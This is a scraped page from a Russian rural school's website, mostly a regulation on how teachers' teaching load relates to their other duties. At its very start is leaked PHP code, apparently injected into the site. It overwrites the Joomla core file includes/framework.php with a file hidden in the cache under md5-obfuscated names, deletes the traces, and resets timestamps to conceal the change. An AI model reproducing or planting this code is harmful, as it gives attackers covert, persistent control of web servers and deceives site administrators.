$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Положение о соотношении учебной (преподавательской) и другой педагогической работы.

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 209730

На сайте

Сейчас 92 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Положение о соотношении учебной (преподавательской) и другой педагогической работы.

 

1. Общие положения

1.1. Положение разработано в соответствии с Федеральным законом от 29 декабря 2012года № 273-ФЗ «Об образовании в Российской Федерации»; Уставом образовательной организации.

1.2.Настоящее положение регулирует соотношение учебной (педагогической) и другой педагогической работы педагогических работник МБОУ «Сагарчинская СОШ» в пределах учебного года.

1.2. Настоящее Положение распространяется на всех штатных и внештатных педагогических работников МБОУ «Сагарчинская СОШ» , работающих на условиях трудового договора.

2. Структура рабочего времени педагогических работников

2.1. В рабочее время педагогических работников в зависимости от занимаемой должности включается учебная (педагогическая), воспитательная работа, индивидуальная работа с обучающимися и воспитанниками, научная, творческая и исследовательская работа, а также другая педагогическая работа, предусмотренная трудовыми (должностными) обязанностями и (или) индивидуальным планом, - методическая, подготовительная, организационная, диагностическая, работа по ведению мониторинга, работа, предусмотренная планами воспитательных, физкультурно-оздоровительных, спортивных, творческих и иных мероприятий, проводимых с обучающимися и воспитанниками.

2.2. Конкретные трудовые (должностные) обязанности педагогических работников определяются их трудовыми договорами и должностными инструкциями.

2.3. К основному персоналу МБОУ «Сагарчинская СОШ» относятся следующие категории сотрудников:

- педагогические работники, непосредственно осуществляющие учебный процесс (учитель, заместитель директора, директор);

- иные категории педагогических работников (педагог дополнительного образования, воспитатель интерната , вожатая, педагог-психолог, социальный педагог).

Выполнение основных работ всеми категориями педагогических работников характеризуется наличием установленных норм содержания деятельности и норм времени на её осуществление, установленных в Должностных инструкциях в МБОУ «Сагарчинская СОШ», оплачивается из базовой части фонда оплаты труда работников образовательной организации в качестве должностного оклада.

2.4. Устанавливаются нормы педагогической деятельности для учителей, воспитателей, педагогов дополнительного образования, определяемые как основная педагогическая работа. Нормируемая часть рабочего времени учителя и педагога дополнительного образования определяется в астрономических часах и включает регулируемые учебным расписанием уроки (учебные кружковые занятия) и перемены, установленные для обучающихся. При проведении уроков (учебных кружковых занятий) перерывы могут суммироваться и использоваться для выполнения другой педагогической работы в порядке, предусмотренном Правилами внутреннего трудового распорядка МБОУ «Сагарчинская СОШ», в том числе – дежурства по образовательной организации.

2.5. При составлении графика дежурств педагогических работников образовательной организации в период проведения учебных занятий, до их начала и после их окончания, учитывается сменность работы, режим рабочего времени каждого педагогического работника в соответствии с расписанием, общим планом мероприятий, другие особенности работы. Не допускаются случаи длительного дежурства педагогических работников, дежурства в дни, когда учебная нагрузка отсутствует или незначительна. К дежурству по учреждению педагогические работники привлекаются не ранее чем за 20 минут до начала своих учебных занятий и не позднее 20 минут после окончания их последнего учебного занятия.

2.6. Учёт учебной (основной педагогической) и другой педагогической работы, проводится заместителем директора по учебной работе, заместителем директора по воспитательной работе (педагога дополнительного образования).

2.7. Должностной оклад учителя, преподавателя и педагога дополнительного образования, оплачиваемый из базовой части фонда оплаты труда, учитывает также другую педагогическую работу педагогического работника, требующую затрат рабочего времени, не конкретизированную по количеству часов, но вытекающую из его Должностных обязанностей, Устава образовательной организации, Коллективного договора, Правил внутреннего трудового распорядка.

2.8. Учёт выполнения работ, связанных с дополнительной занятостью педагога, оплата которой включена в должностной оклад, осуществляется руководителем методического объединения, а также - заместителями директора по учебно-воспитательной, воспитательной работе и зам. директора по безопасности в рамках их компетентности, установленной приказом о распределении обязанностей между членами администрации.

3. Порядок нормирования и учёта дополнительных работ, выполняемых работниками образовательной организации.

3.1. Для педагогических работников, непосредственно осуществляющих учебный процесс, определяются следующие дополнительные виды работ, оплачиваемых из стимулирующей части фонда оплаты труда работников образовательной организации на основе Дополнительного соглашения к Трудовому договору между педагогическим работником и работодателем:

-проверка тетрадей и других контрольно-диагностических материалов;

-подготовка лабораторного демонстрационного оборудования для проведения уроков и других учебных занятий;

-руководство методическим объединением или другим локальным профессиональным сообществом в школе и в муниципальном районе;

-индивидуальные занятия с больными детьми на дому;

-работа с одарёнными детьми;

-работа по реализации приоритетных направлений программы развития школы;

-осуществление инновационной и опытно-экспериментальной деятельности;

-работа по внедрению современных, в том числе информационных технологий в образовательный процесс;

-обучение больных детей и детей-инвалидов на дому;

-заведование кабинетом.